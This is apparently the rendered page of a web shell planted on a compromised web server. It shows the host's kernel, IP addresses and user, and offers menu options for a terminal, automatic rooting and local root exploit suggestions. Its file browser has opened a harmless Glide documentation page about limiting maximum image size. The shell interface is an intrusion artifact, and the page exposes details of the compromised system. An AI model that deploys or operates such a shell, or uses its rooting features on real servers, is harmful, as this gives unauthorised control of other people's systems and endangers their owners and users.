Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
league /
glide /
docs /
0.3 /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
base-url.md
1005
B
-rw-r--r--
2020-11-05 09:00
basic-usage.md
1.47
KB
-rw-r--r--
2020-11-05 09:00
image-driver.md
406
B
-rw-r--r--
2020-11-05 09:00
max-image-size.md
621
B
-rw-r--r--
2020-11-05 09:00
secure-images.md
1.5
KB
-rw-r--r--
2020-11-05 09:00
source-and-cache.md
1.79
KB
-rw-r--r--
2020-11-05 09:00
the-server.md
2.03
KB
-rw-r--r--
2020-11-05 09:00
Save
Rename
--- layout: default title: Max image size --- # Max image size In addition to [securing images](/config/secure-images/) with a signing key, you can also limit how large images can be generated. The following setting will set the maximum allowed total image size, in pixels. ~~~ php <?php $server = League\Glide\ServerFactory::create([ 'max_image_size' => 2000*2000, ]); ~~~ Notice that Glide doesn't actually restrict the width or height, but rather the total image size. In the above example it would be `4000000px`. This accomplishes the exact same thing, while offering more flexibility with your image sizes.